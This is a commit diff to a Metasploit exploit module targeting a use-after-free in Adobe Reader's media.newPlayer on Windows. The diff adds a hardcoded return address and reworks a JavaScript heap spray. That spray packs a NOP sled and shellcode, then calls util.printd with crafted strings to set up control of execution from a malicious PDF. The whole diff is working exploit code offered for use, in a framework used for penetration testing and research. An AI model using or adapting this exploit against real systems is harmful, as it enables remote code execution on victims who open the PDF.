port changes from Lurene to browser version

git-svn-id: file:///home/svn/framework3/trunk@7901 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/adobe_media_newplayer.rb

@@ -66,9 +66,10 @@ class Metasploit3 < Msf::Exploit::Remote
 					# reader 9.0.0 - untested
 					# reader 9.1.0 - works
 					# reader 9.2 - works (no debugger, no DEP)
-					[ 'Adobe Reader Windows Universal (JS Heap Spray)',
+					[ 'Adobe Reader Windows English (JS Heap Spray)',
 						{
-							'Size'      => (0x10000/2)
+							'Size'      => (0x10000/2),
+							'Ret'       => 0x2e0031
 						}
 					],
 				],
@@ -93,13 +94,22 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Make some nops
 		nops    = Rex::Text.to_unescape(make_nops(4))
 
+		len = 72
+		
 		# Randomize variables
 		rand1  = rand_text_alpha(rand(100) + 1)
 		rand2  = rand_text_alpha(rand(100) + 1)
+		rand3  = rand_text_alpha(rand(100) + 1)
+		rand4  = rand_text_alpha(len/2);
+		rand5  = rand_text_alpha(len/2);
 		
+		retstring = Rex::Text.to_unescape([target.ret].pack('V') + rand_text_alpha(len-4))
+		
+		# The printd strings are 72 bytes (??)
 		script = %Q|
 var #{rand1} = unescape("#{shellcode}");
 var #{rand2} = unescape("#{nops}");
+var #{rand3} = unescape("#{retstring}");
 
 while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
 #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
@@ -110,10 +120,10 @@ for(i=0;i<0x2000;i++) {
   memory[i]= #{rand2} + #{rand1};
 }
 
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
+util.printd("#{rand4}", new Date());
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
+util.printd("#{rand5}", new Date());
 try {this.media.newPlayer(null);} catch(e) {}
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
+util.printd("#{rand3}", new Date());
 |
 		# Create the pdf
 		pdf = make_pdf(script)